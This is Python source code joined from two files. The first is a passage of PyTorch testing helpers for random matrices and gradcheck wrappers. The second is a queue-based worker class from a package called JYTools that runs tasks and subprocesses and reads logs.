Returns a batch of random Hermitian semi-positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_psd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)), dtype=dtype, device=device)
return torch.matmul(A, A.conj().transpose(-2, -1))
# TODO: remove this (prefer make_symmetric_pd_matrices below)
def random_symmetric_pd_matrix(matrix_size, *batch_dims, **kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1)) \
+ torch.eye(matrix_size, dtype=dtype, device=device) * 1e-5
# Creates a symmetric positive-definite matrix or batch of
# such matrices
def make_symmetric_pd_matrices(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
t = torch.matmul(t, t.transpose(-2, -1))
i = torch.eye(shape[-1], device=device, dtype=dtype) * 1e-5
return t + i
def random_hermitian_pd_matrix(matrix_size, *batch_dims, dtype, device):
"""
Returns a batch of random Hermitian positive-definite matrices.
The shape of the result is batch_dims + (matrix_size, matrix_size)
The following example creates a tensor of size 2 x 4 x 3 x 3
>>> matrices = random_hermitian_pd_matrix(3, 2, 4, dtype=dtype, device=device)
"""
A = torch.randn(*(batch_dims + (matrix_size, matrix_size)),
dtype=dtype, device=device)
return torch.matmul(A, A.transpose(-2, -1).conj()) \
+ torch.eye(matrix_size, dtype=dtype, device=device)
# TODO: remove this (prefer make_fullrank_matrices_with_distinct_singular_values below)
def random_fullrank_matrix_distinct_singular_value(matrix_size, *batch_dims,
**kwargs):
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
if silent and not torch._C.has_lapack:
return torch.ones(matrix_size, matrix_size, dtype=dtype, device=device)
A = torch.randn(batch_dims + (matrix_size, matrix_size), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
real_dtype = A.real.dtype if A.dtype.is_complex else A.dtype
s = torch.arange(1., matrix_size + 1, dtype=real_dtype, device=device).mul_(1.0 / (matrix_size + 1))
return (u * s.to(A.dtype)) @ vh
# Creates a full rank matrix with distinct singular values or
# a batch of such matrices
# Shape must be a square matrix or batch of square matrices
def make_fullrank_matrices_with_distinct_singular_values(*shape, device, dtype):
assert shape[-1] == shape[-2]
t = make_tensor(shape, device=device, dtype=dtype)
u, _, vh = torch.linalg.svd(t, full_matrices=False)
# TODO: improve the handling of complex tensors here
real_dtype = t.real.dtype if t.dtype.is_complex else t.dtype
s = torch.arange(1., shape[-1] + 1, dtype=real_dtype, device=device).mul_(1.0 / (shape[-1] + 1))
return (u * s.to(dtype)) @ vh
def random_matrix(rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices.
Parameters:
dtype - the data type
device - the device kind
singular - when True, the output will be singular
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
silent = kwargs.get("silent", False)
singular = kwargs.get("singular", False)
if silent and not torch._C.has_lapack:
return torch.ones(rows, columns, dtype=dtype, device=device)
A = torch.randn(batch_dims + (rows, columns), dtype=dtype, device=device)
u, _, vh = torch.linalg.svd(A, full_matrices=False)
k = min(rows, columns)
s = torch.linspace(1 / (k + 1), 1, k, dtype=dtype, device=device)
if singular:
# make matrix singular
s[k - 1] = 0
if k > 2:
# increase the order of singularity so that the pivoting
# in LU factorization will be non-trivial
s[0] = 0
return (u * s.unsqueeze(-2)) @ vh
def random_lowrank_matrix(rank, rows, columns, *batch_dims, **kwargs):
"""Return rectangular matrix or batches of rectangular matrices with
given rank.
"""
B = random_matrix(rows, rank, *batch_dims, **kwargs)
C = random_matrix(rank, columns, *batch_dims, **kwargs)
return B.matmul(C)
def random_sparse_matrix(rows, columns, density=0.01, **kwargs):
"""Return rectangular random sparse matrix within given density.
The density of the result approaches to given density as the size
of the matrix is increased and a relatively small value of density
is specified but higher than min(rows, columns)/(rows * columns)
for non-singular matrices.
"""
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
singular = kwargs.get("singular", False)
k = min(rows, columns)
nonzero_elements = max(min(rows, columns), int(rows * columns * density))
row_indices = [i % rows for i in range(nonzero_elements)]
column_indices = [i % columns for i in range(nonzero_elements)]
random.shuffle(column_indices)
indices = [row_indices, column_indices]
values = torch.randn(nonzero_elements, dtype=dtype, device=device)
# ensure that the diagonal dominates
values *= torch.tensor([-float(i - j)**2 for i, j in zip(*indices)], dtype=dtype, device=device).exp()
indices_tensor = torch.tensor(indices)
A = torch.sparse_coo_tensor(indices_tensor, values, (rows, columns), device=device)
return A.coalesce()
def random_sparse_pd_matrix(matrix_size, density=0.01, **kwargs):
"""Return random sparse positive-definite matrix with given density.
The eigenvalues of the matrix are defined as::
arange(1, matrix_size+1)/matrix_size
Algorithm:
A = diag(arange(1, matrix_size+1)/matrix_size)
while <A density is smaller than required>:
<choose random i, j in range(matrix_size), theta in [0, 2*pi]>
R = <rotation matrix (i,j,theta)>
A = R^T A R
"""
import math
torch = kwargs.get('torch', globals()['torch'])
dtype = kwargs.get('dtype', torch.double)
device = kwargs.get('device', 'cpu')
    data = {(i, i): float(i + 1) / matrix_size for i in range(matrix_size)}
def multiply(data, N, i, j, cs, sn, left=True):
for k in range(N):
if left:
ik, jk = (k, i), (k, j)
else:
ik, jk = (i, k), (j, k)
aik, ajk = data.get(ik, 0), data.get(jk, 0)
aik, ajk = cs * aik + sn * ajk, -sn * aik + cs * ajk
if aik:
data[ik] = aik
else:
data.pop(ik, None)
if ajk:
data[jk] = ajk
else:
data.pop(jk, None)
target_nnz = density * matrix_size * matrix_size
while len(data) < target_nnz:
i = random.randint(0, matrix_size - 1)
j = random.randint(0, matrix_size - 1)
if i != j:
theta = random.uniform(0, 2 * math.pi)
cs = math.cos(theta)
sn = math.sin(theta)
multiply(data, matrix_size, i, j, cs, sn, left=True)
multiply(data, matrix_size, i, j, cs, sn, left=False)
icoords, jcoords, values = [], [], []
for (i, j), v in sorted(data.items()):
icoords.append(i)
jcoords.append(j)
values.append(v)
indices_tensor = torch.tensor([icoords, jcoords])
return torch.sparse_coo_tensor(indices_tensor, values, (matrix_size, matrix_size), dtype=dtype, device=device)
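# Editor's illustrative sketch (not part of the original module): a 100 x 100 sparse
# positive-definite matrix at roughly 2% density:
#     a = random_sparse_pd_matrix(100, density=0.02, dtype=torch.double, device='cpu')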
def do_test_dtypes(self, dtypes, layout, device):
for dtype in dtypes:
if dtype != torch.float16:
out = torch.zeros((2, 3), dtype=dtype, layout=layout, device=device)
self.assertIs(dtype, out.dtype)
self.assertIs(layout, out.layout)
self.assertEqual(device, out.device)
def do_test_empty_full(self, dtypes, layout, device):
shape = torch.Size([2, 3])
def check_value(tensor, dtype, layout, device, value, requires_grad):
self.assertEqual(shape, tensor.shape)
self.assertIs(dtype, tensor.dtype)
self.assertIs(layout, tensor.layout)
self.assertEqual(tensor.requires_grad, requires_grad)
if tensor.is_cuda and device is not None:
self.assertEqual(device, tensor.device)
if value is not None:
fill = tensor.new(shape).fill_(value)
self.assertEqual(tensor, fill)
def get_int64_dtype(dtype):
module = '.'.join(str(dtype).split('.')[1:-1])
if not module:
return torch.int64
return operator.attrgetter(module)(torch).int64
default_dtype = torch.get_default_dtype()
check_value(torch.empty(shape), default_dtype, torch.strided, -1, None, False)
check_value(torch.full(shape, -5.), default_dtype, torch.strided, -1, None, False)
for dtype in dtypes:
for rg in {dtype.is_floating_point, False}:
int64_dtype = get_int64_dtype(dtype)
v = torch.empty(shape, dtype=dtype, device=device, layout=layout, requires_grad=rg)
check_value(v, dtype, layout, device, None, rg)
out = v.new()
check_value(torch.empty(shape, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, None, rg)
check_value(v.new_empty(shape), dtype, layout, device, None, False)
check_value(v.new_empty(shape, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
check_value(torch.empty_like(v), dtype, layout, device, None, False)
check_value(torch.empty_like(v, dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, None, False)
if dtype is not torch.float16 and layout != torch.sparse_coo:
fv = 3
v = torch.full(shape, fv, dtype=dtype, layout=layout, device=device, requires_grad=rg)
check_value(v, dtype, layout, device, fv, rg)
check_value(v.new_full(shape, fv + 1), dtype, layout, device, fv + 1, False)
out = v.new()
check_value(torch.full(shape, fv + 2, out=out, device=device, layout=layout, requires_grad=rg),
dtype, layout, device, fv + 2, rg)
check_value(v.new_full(shape, fv + 3, dtype=int64_dtype, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 3, False)
check_value(torch.full_like(v, fv + 4), dtype, layout, device, fv + 4, False)
check_value(torch.full_like(v, fv + 5,
dtype=int64_dtype, layout=layout, device=device, requires_grad=False),
int64_dtype, layout, device, fv + 5, False)
# this helper method is to recursively
# clone the tensor-type input of operators tested by OpInfo
def clone_input_helper(input):
if isinstance(input, torch.Tensor):
return torch.clone(input)
if isinstance(input, Sequence):
return tuple(map(clone_input_helper, input))
return input
THESE_TAKE_WAY_TOO_LONG = {
'test_Conv3d_groups',
'test_conv_double_backward',
'test_conv_double_backward_groups',
'test_Conv3d_dilated',
'test_Conv3d_stride_padding',
'test_Conv3d_dilated_strided',
'test_Conv3d',
'test_Conv2d_dilated',
'test_ConvTranspose3d_dilated',
'test_ConvTranspose2d_dilated',
'test_snli',
'test_Conv2d',
'test_Conv2d_padding',
'test_ConvTranspose2d_no_bias',
'test_ConvTranspose2d',
'test_ConvTranspose3d',
'test_Conv2d_no_bias',
'test_matmul_4d_4d',
'test_multinomial_invalid_probs',
}
running_script_path = None
def set_running_script_path():
global running_script_path
try:
running_file = os.path.abspath(os.path.realpath(sys.argv[0]))
if running_file.endswith('.py'): # skip if the running file is not a script
running_script_path = running_file
except Exception:
pass
def check_test_defined_in_running_script(test_case):
if running_script_path is None:
return
test_case_class_file = os.path.abspath(os.path.realpath(inspect.getfile(test_case.__class__)))
assert test_case_class_file == running_script_path, "Class of loaded TestCase \"{}\" " \
"is not defined in the running script \"{}\", but in \"{}\". Did you " \
"accidentally import a unittest.TestCase from another file?".format(
test_case.id(), running_script_path, test_case_class_file)
def load_tests(loader, tests, pattern):
set_running_script_path()
test_suite = unittest.TestSuite()
for test_group in tests:
for test in test_group:
check_test_defined_in_running_script(test)
test_suite.addTest(test)
return test_suite
class BytesIOContext(io.BytesIO):
def __enter__(self):
return self
def __exit__(self, *args):
pass
# Tentative value for nondet_tol for gradcheck when backward implementation
# relies on nondeterministic operations, i.e., those listed here:
# https://pytorch.org/docs/stable/generated/torch.use_deterministic_algorithms.html
#
# For more information see https://github.com/pytorch/pytorch/issues/56202
GRADCHECK_NONDET_TOL = 1e-12
def gradcheck(fn, inputs, **kwargs):
# Wrapper around gradcheck that enables certain keys by default.
# Use this testing-internal gradcheck instead of autograd.gradcheck so that new features like vmap and
    # forward-mode AD are tested by default. We create this wrapper because we'd like to keep the new checks
    # disabled by default for the public-facing api to avoid breaking user code.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradcheck.
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
        # default values also override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradcheck(fn, inputs, **kwargs)
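# Editor's illustrative sketch (not part of the original module): a typical call site;
# double-precision inputs with requires_grad=True are expected by gradcheck.
def _example_gradcheck_usage():
    x = torch.randn(3, 3, dtype=torch.double, requires_grad=True)
    # check_batched_grad and fast_mode are enabled by default through this wrapper
    return gradcheck(torch.sin, (x,))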
def gradgradcheck(fn, inputs, grad_outputs=None, **kwargs):
# Wrapper around gradgradcheck that enables certain keys by default
# See gradcheck above for an explanation of why we need something like this.
#
# All PyTorch devs doing testing should use this wrapper instead of autograd.gradgradcheck
default_values = {
"check_batched_grad": True,
"fast_mode": True,
}
    if os.environ.get('PYTORCH_TEST_WITH_SLOW_GRADCHECK', "OFF") == "ON":
default_values["fast_mode"] = False
for key, value in default_values.items():
        # default values also override values explicitly set to None
k = kwargs.get(key, None)
kwargs[key] = k if k is not None else value
return torch.autograd.gradgradcheck(fn, inputs, grad_outputs, **kwargs)
def _assertGradAndGradgradChecks(test_case, apply_fn, inputs, **kwargs):
# call assert function rather than returning a bool since it's nicer
# if we get whether this failed on the gradcheck or the gradgradcheck.
test_case.assertTrue(gradcheck(apply_fn, inputs, **kwargs))
test_case.assertTrue(gradgradcheck(apply_fn, inputs, **kwargs))
@contextmanager
def set_cwd(path: str) -> Iterator[None]:
old_cwd = os.getcwd()
try:
os.chdir(path)
yield
finally:
os.chdir(old_cwd)
# Using @precisionOverride specific to your test is the recommended way
# of doing this. These are just some values that worked for test_nn.
dtype2prec_DONTUSE = {torch.float: 1e-5,
torch.double: 1e-5,
torch.half: 1e-2,
torch.bfloat16: 1e-1}
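# Editor's illustrative sketch (not part of the original module), assuming the
# precisionOverride decorator from torch.testing._internal.common_device_type:
#
#     @precisionOverride({torch.half: 1e-2, torch.bfloat16: 1e-1})
#     def test_my_op(self, device, dtype):
#         ...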
def _wrap_warn_once(regex):
def decorator(fn):
def inner(self, *args, **kwargs):
with self.assertWarnsOnceRegex(UserWarning, regex):
fn(self, *args, **kwargs)
return inner
return decorator
# This is a wrapper that wraps a test to run this test twice, one with
# coalesced=True, another with coalesced=False for coalesced/uncoalesced sparse tensors.
def coalescedonoff(f):
@wraps(f)
def wrapped(self, *args, **kwargs):
f(self, *args, **kwargs, coalesced=True)
f(self, *args, **kwargs, coalesced=False)
return wrapped
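# Editor's illustrative sketch (not part of the original module): a sparse test wrapped
# with @coalescedonoff must accept the extra `coalesced` keyword, e.g.
#
#     @coalescedonoff
#     def test_sparse_sum(self, device, dtype, coalesced):
#         ...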
@contextlib.contextmanager
def disable_gc():
if gc.isenabled():
try:
gc.disable()
yield
finally:
gc.enable()
else:
yield
def find_library_location(lib_name: str) -> Path:
# return the shared library file in the installed folder if exist,
# else the file in the build folder
torch_root = Path(torch.__file__).resolve().parent
path = torch_root / 'lib' / lib_name
if os.path.exists(path):
return path
torch_root = Path(__file__).resolve().parent.parent.parent
return torch_root / 'build' / 'lib' / lib_name
def sandcastle_skip(reason):
"""
Similar to unittest.skip, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
return wrapper
return decorator
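# Editor's illustrative sketch (not part of the original module): used exactly like
# unittest.skip, with a hypothetical reason string.
#
#     @sandcastle_skip("temporarily disabled, see issue tracker")
#     def test_something(self):
#         ...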
def mock_wrapper(method):
"""
Returns a function that calls the real implementation of a method
in addition to passing args to a mock object.
"""
mock = MagicMock()
@wraps(method)
def wrapper(self, *args, **kwargs):
mock(*args, **kwargs)
return method(self, *args, **kwargs)
wrapper.mock = mock # type: ignore[attr-defined]
return wrapper
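# Editor's illustrative sketch (not part of the original module): wrapping a method so a
# test can both run the real implementation and assert on the recorded calls.
def _example_mock_wrapper_usage():
    class _Foo:
        bar = mock_wrapper(lambda self, x: x + 1)

    f = _Foo()
    result = f.bar(2)                         # runs the real lambda and returns 3
    _Foo.bar.mock.assert_called_once_with(2)  # the attached MagicMock recorded the call
    return result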
def get_tensors_from(args, kwargs):
""" Returns a set of all Tensor objects in the given args and kwargs. """
return set([arg for arg in args if isinstance(arg, Tensor)] +
[v for v in kwargs.values() if isinstance(v, Tensor)])
def has_breakpad():
# We always build with breakpad in CI
if IS_IN_CI:
return True
# If not on a special build, check that the library was actually linked in
try:
torch._C._get_minidump_directory() # type: ignore[attr-defined]
return True
except RuntimeError as e:
if "Minidump handler is uninintialized" in str(e):
return True
return False
def sandcastle_skip_if(condition, reason):
"""
Similar to unittest.skipIf, however in the sandcastle environment it just
"passes" the test instead to avoid creating tasks complaining about tests
skipping continuously.
"""
def decorator(func):
if not IS_SANDCASTLE and condition:
func.__unittest_skip__ = True
func.__unittest_skip_why__ = reason
return func
@wraps(func)
def wrapper(*args, **kwargs):
if condition and IS_SANDCASTLE:
print(f'Skipping {func.__name__} on sandcastle for following reason: {reason}', file=sys.stderr)
return
else:
return func(*args, **kwargs)
return wrapper
return decorator
|
_Worker.py
|
#! /usr/bin/env python
# coding: utf-8
import os
import re
import sys
import signal
import json
import uuid
import types
import subprocess
from time import time, sleep
import threading
import logging
import traceback
from JYTools import StringTool
from JYTools.JYWorker.util import ValueVerify, ReportScene
from ._exception import TaskErrorException, InvalidTaskException, WorkerTaskParamsKeyNotFound
from ._exception import WorkerTaskParamsValueTypeError
from ._Task import TaskStatus, WorkerTask, WorkerTaskParams, TaskType
from ._config import WorkerConfig, WorkerLogConfig
__author__ = 'meisanggou'
class _WorkerLog(WorkerLogConfig):
def worker_log(self, *args, **kwargs):
pass
def task_log(self, *args, **kwargs):
pass
"""
add in 0.7.5
"""
def task_debug_log(self, *args, **kwargs):
kwargs.update(level="DEBUG")
self.task_log(*args, **kwargs)
"""
add in 1.9.1
"""
def task_warning_log(self, *args, **kwargs):
kwargs.update(level="WARNING")
self.task_log(*args, **kwargs)
class Worker(WorkerConfig, _WorkerLog):
"""
expect_params_type
add in version 0.6.9
"""
expect_params_type = None
def __init__(self, log_dir=None, work_tag=None, **kwargs):
WorkerConfig.__init__(self, work_tag=work_tag, **kwargs)
_WorkerLog.__init__(self, log_dir=log_dir, **kwargs)
if StringTool.is_string(self.work_tag) is False:
class_name = self.__class__.__name__
msg = "Need String work_tag. Please Set {0}.DEFAULT_WORK_TAG=yourWorkTag Or {0}(work_tag=yourWorkTag)"
raise TypeError(msg.format(class_name))
if ValueVerify.v_work_tag(self.work_tag) is False:
raise ValueError("Invalid work_tag format")
self._id = uuid.uuid4().hex # add in 0.9.11
self._msg_manager = None
        self.is_running = False  # Whether the worker's main loop has started and keeps receiving tasks; once running, test mode (the test() method) can no longer be entered
self._debug = False
self.before_handle_funcs = []
self.after_handle_funcs = []
self.init_log_dir()
self._handle_task_func = self.handle_task
self.num_success_job = 0 # add in 0.8.1
self.num_fail_job = 0 # add in 0.8.1
self.num_wrongful_job = 0 # add in 0.8.1
self.num_invalid_job = 0 # add in 0.8.1
self.num_null_job = 0 # add in 0.8.1
        self.num_pop_task = 0  # add in 1.6.8 number of attempts to pop a task (regardless of whether data was obtained or which queue it came from)
if "worker_index" in kwargs:
self.worker_index = kwargs["worker_index"]
if "redirect_stdout" in kwargs:
self.redirect_stdout = kwargs["redirect_stdout"]
self.heartbeat_key = self.heartbeat_prefix_key + "_" + self.work_tag
self.queue_key = self.queue_prefix_key + "_" + self.work_tag
        # Delay queue: paired with the normal queue; it is only polled once for every fixed number of polls of the normal queue
self.delay_queue_key = self.queue_prefix_key + "_" + self.work_tag + "@delay"
self.clock_key = self.clock_prefix_key + "_" + self.work_tag + "_" + self._id
self.current_task = WorkerTask()
        self._worker_status = 0  # Internal running state, currently used mainly when handling a received kill signal
"""
add in 0.4.0
"""
def init_log_dir(self):
if self.log_dir is not None:
exclusive_log_dir = os.path.join(self.log_dir, self.work_tag.lower())
if os.path.isdir(exclusive_log_dir):
self.log_dir = exclusive_log_dir
else:
try:
os.mkdir(exclusive_log_dir)
self.log_dir = exclusive_log_dir
except OSError:
pass
"""
property
add in 0.6.9
"""
@property
def debug(self):
return self._debug
@debug.setter
def debug(self, v):
if self.is_running is True:
return
if not isinstance(v, bool):
raise TypeError("need bool value for debug")
self._debug = v
if self.debug is True:
self.redirect_stdout = False
@property
def num_total_job(self):
r_job = self.num_worked_job
t_job = r_job + self.num_wrongful_job + self.num_null_job
return t_job
@property
def num_worked_job(self):
return self.num_success_job + self.num_fail_job + self.num_invalid_job
def has_heartbeat(self):
return True
def write(self, *args, **kwargs):
self.task_log(*args, **kwargs)
def push_task(self, key, params, work_tag=None, sub_key=None, is_report=False):
pass
@staticmethod
def _subprocess_timeout_thread(p, timeout):
"""
add in version 0.7.7
:param p:
:param timeout:
:return:
"""
while timeout > 0:
r_code = p.poll()
if r_code is not None:
return
timeout -= 1
sleep(1)
p.kill()
return
def execute_subprocess(self, cmd, stdout=None, stderr=None, error_continue=False, timeout=None, out_file=None):
self.task_debug_log(cmd)
if isinstance(cmd, list) is True:
            cmd = [str(x) if isinstance(x, int) else x for x in cmd]  # keep cmd a list; map() returns an iterator on Python 3 and would break the len()/indexing below
if out_file is not None:
std_out = open(out_file, mode="w")
else:
std_out = stdout
if std_out is None and len(cmd) > 2 and cmd[-2] == ">":
std_out = open(cmd[-1], mode="w")
cmd = cmd[:-2]
std_err = stderr
if std_out is None:
std_out = subprocess.PIPE
if std_err is None:
if std_out == subprocess.PIPE:
std_err = subprocess.STDOUT
else:
std_err = subprocess.PIPE
child = subprocess.Popen(cmd, stderr=std_err, stdout=std_out)
if isinstance(timeout, int) and timeout > 0:
t_timeout = threading.Thread(target=self._subprocess_timeout_thread, args=(child, timeout))
t_timeout.start()
else:
t_timeout = None
if child.stdout is not None:
std_log = child.stdout
elif child.stderr is not None:
std_log = child.stderr
else:
std_log = None
exec_msg = ""
while std_log:
out_line = std_log.readline()
if out_line is None or len(out_line) <= 0:
break
exec_msg += out_line
self.task_log(out_line)
child.wait()
if t_timeout is not None:
t_timeout.join()
r_code = child.returncode
if r_code != 0:
if error_continue is False:
self.set_current_task_error(cmd[0], " exit code not 0, is ", r_code)
else:
self.task_debug_log(cmd[0], " exit code not 0, is ", r_code, " but continue return.")
else:
self.task_debug_log(cmd[0], " exit code 0")
return r_code, exec_msg
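    # Editor's illustrative sketch (not part of the original module): inside a handle_task
    # implementation, a command with a 60 second timeout could be run as
    #     r_code, output = self.execute_subprocess(["python", "run.py", "--n", 5], timeout=60)
    # (the script name and arguments are hypothetical); integer arguments are converted
    # to strings and stdout is streamed into the task log.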
def _execute(self):
if self.current_task.task_name is not None:
self.worker_log("Start Execute", self.current_task.task_key, self.current_task.task_name)
else:
self.worker_log("Start Execute", self.current_task.task_key)
self.hang_up_clock(1)
self.current_task.start_time = time()
standard_out = None
try:
for func in self.before_handle_funcs:
func()
if self.redirect_stdout is True:
standard_out = sys.stdout
sys.stdout = self
self.current_task.task_status = TaskStatus.RUNNING
if self.current_task.task_type == TaskType.Normal and self.current_task.task_report_tag is not None:
if ReportScene.include_begin(self.current_task.task_report_scene) is True:
self.task_debug_log("Start Report Task Running Status")
self.push_task(self.current_task.task_key, self.current_task.to_dict(),
work_tag=self.current_task.task_report_tag, sub_key=self.current_task.task_sub_key,
is_report=True)
if self.current_task.task_type == TaskType.Normal:
self._handle_task_func(self.current_task.task_key, self.current_task.task_params)
elif self.current_task.task_type == TaskType.Control:
self.handle_control(**self.current_task.task_params)
else:
self.handle_report_task()
if self.current_task.task_status == TaskStatus.RUNNING:
self.current_task.task_status = TaskStatus.SUCCESS
if standard_out is not None:
sys.stdout = standard_out
for func in reversed(self.after_handle_funcs):
func()
self.num_success_job += 1
except WorkerTaskParamsKeyNotFound as pk:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = "Need Key %s, Not Found." % pk.missing_key
self.task_log(self.current_task.task_message, level="ERROR")
self.num_invalid_job += 1
except WorkerTaskParamsValueTypeError as pvt:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = "Need Value Type %s, Not Match." % pvt.except_type
self.task_log(self.current_task.task_message, level="ERROR")
self.num_invalid_job += 1
except TaskErrorException as te:
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = te.error_message
self.worker_log("Task: ", te.key, "Params: ", te.params, " Error Info: ", te.error_message)
self.task_log(te.error_message, level="ERROR")
self.num_fail_job += 1
except InvalidTaskException as it:
self.current_task.task_status = TaskStatus.INVALID
self.current_task.task_message = it.invalid_message
            self.task_log(it.invalid_message, level="WARNING")
self.worker_log("Invalid Task ", it.task_info, " Invalid Info: ", it.invalid_message)
self.num_invalid_job += 1
except Exception as e:
if TaskStatus.is_fail(self.current_task.task_status) is False:
                # Avoid setting FAIL twice or overwriting a FAIL the user already set
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = str(e)
self.task_log(traceback.format_exc(), level="ERROR")
self._execute_error(e)
self.num_fail_job += 1
except SystemExit as se:
if self.is_running is False:
sys.exit(se.code)
self.current_task.task_status = TaskStatus.FAIL
self.current_task.task_message = str(se)
self.task_log(traceback.format_exc(), level="ERROR")
self.num_fail_job += 1
finally:
if standard_out is not None:
sys.stdout = standard_out
self.current_task.end_time = time()
if self.current_task.auto_report is True and self.current_task.task_report_tag is not None:
self.task_debug_log("Start Report Task Status")
self.push_task(self.current_task.task_key, self.current_task.to_dict(),
work_tag=self.current_task.task_report_tag, sub_key=self.current_task.task_sub_key,
is_report=True)
use_time = self.current_task.end_time - self.current_task.start_time
self.task_debug_log("Use ", use_time, " Seconds")
self.worker_log("Completed Task", self.current_task.task_key)
task_output = self.current_task.task_output
task_status = self.current_task.task_status
self.current_task = None
return task_status, task_output
def _execute_error(self, e):
if self.handler_task_exception is not None:
self.handler_task_exception(e)
    # To be deprecated: superseded by handle_task
def handler_task(self, key, params):
pass
    # Method intended to be overridden by subclasses
def handle_task(self, key, params):
self.handler_task(key, params)
    # To be deprecated: superseded by handle_report_task
def handler_report_task(self):
"""
add in version 0.1.19
"""
pass
def handle_report_task(self):
self.handler_report_task()
    # Method intended to be overridden by subclasses
def handler_task_exception(self, e):
pass
    # Method intended to be overridden by subclasses
def handle_control(self, expected_status, **params):
self.set_current_task_invalid("Worker not support control task status")
def handle_invalid_task(self, task_info, error_info):
pass
def hang_up_clock(self, freq=None):
pass
def hang_down_clock(self):
pass
def set_current_task_invalid(self, *args):
"""
add in version 0.1.14
"""
if self.current_task.task_key is not None:
raise InvalidTaskException(self.current_task.task_key, self.current_task.task_params, self.current_task,
*args)
def set_current_task_error(self, *args):
"""
add in version 0.1.18
"""
if self.current_task.task_key is not None:
raise TaskErrorException(self.current_task.task_key, self.current_task.task_params, *args)
def set_output(self, key, value):
self.task_debug_log("Task Out ", key, ": ", value)
if isinstance(self.current_task, WorkerTask):
self.current_task.task_output[key] = value
def set_multi_output(self, **kwargs):
for key, value in kwargs.items():
self.set_output(key, value)
@property
def msg_manager(self):
return self._msg_manager
@msg_manager.setter
def msg_manager(self, msg_manager):
if msg_manager is None:
return
if hasattr(msg_manager, "publish_message") is False:
return
if isinstance(msg_manager.publish_message, types.MethodType) is False:
return
self._msg_manager = msg_manager
def publish_message(self, message):
"""
add in version 0.1.4
"""
if self.msg_manager is None:
return
try:
self.msg_manager.publish_message(message, self.work_tag)
except Exception as e:
logging.error(e)
def run(self, wash_old=False):
pass
def test(self, key, params=None, params_path=None, sub_key=None, report_tag=None, report_scene=None, debug=True):
        if self.is_running is True:  # once the worker is running, test mode (the test() method) can no longer be entered
raise RuntimeError("Can not test, current is running")
self.debug = debug
if params is None and params_path is not None:
with open(params_path, "r") as rp:
c = rp.read()
params = json.loads(c)
task_item = WorkerTask(work_tag=self.work_tag, task_key=key, task_sub_key=sub_key, task_report_tag=report_tag)
if report_scene is not None:
task_item.set(task_report_scene=report_scene)
if self.expect_params_type is not None:
if not isinstance(params, self.expect_params_type):
raise TypeError("params should", self.expect_params_type)
if isinstance(params, dict):
task_item.set(task_params=WorkerTaskParams(**params))
task_item.task_params.debug_func = self.task_debug_log
else:
task_item.set(task_params=params)
if StringTool.is_string(self.log_dir) is True:
log_name = StringTool.join_encode([self.work_tag, "_", task_item.task_key, ".log"], join_str="")
task_item.log_path = StringTool.path_join(self.log_dir, log_name)
self.current_task = task_item
return self._execute()
def handle_sign(self, sign, frame):
self.task_log("Worker Receive SIGN", sign)
self.close(sign)
def work(self, daemon=False, wash_old=True):
"""
add in version 0.1.8
"""
# handle SIGINT 2 from ctrl+c
signal.signal(signal.SIGINT, self.handle_sign)
# handle SIGTERM 15 from kill
signal.signal(signal.SIGTERM, self.handle_sign)
# handle
signal.signal(signal.SIGUSR1, self.handle_sign)
signal.signal(signal.SIGUSR2, self.handle_sign)
if daemon is not False:
self.debug = False
try:
pid = os.fork()
                if pid == 0:  # fork() returns the child's pid (> 0) in the parent; 0 means this is the child process
self.run(wash_old)
except OSError:
sys.exit(1)
else:
self.run(wash_old)
def close(self, exit_code=0):
self.is_running = False
self.hang_down_clock()
self.worker_log("start close. exit code: %s" % exit_code)
sys.exit(exit_code)
"""
ReadWorkerLog Add In Version 1.0.4
"""
class ReadWorkerLog(WorkerLogConfig):
log_pattern = r"^\[[\s\S]+?\](\[[\s\S]*?\]|) (\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}): ([a-z]{1,10}) ([\s\S]*)"
log_compile = re.compile(log_pattern, re.I)
log_level = dict(DEBUG=("DEBUG", "INFO", "WARING", "WARNING", "ERROR"), INFO=("INFO", "WARING", "WARNING", "ERROR"),
WARNING=("WARING", "WARNING", "ERROR"), ERROR=("ERROR", ))
def read_task_log(self, work_tag, key, sub_key=None, sub_key_prefix=None, level="INFO", max_length=1000000):
"""
:param work_tag:
:param key:
        :param sub_key: None queries logs both with and without a sub key; an empty string queries only logs without a sub key; a specific sub key queries only that sub key's logs
        :param level: defaults to INFO; DEBUG, INFO, WARNING and ERROR are accepted, any other value is treated as INFO
:return:
"""
name = StringTool.join([work_tag, "_", key, ".log"], "")
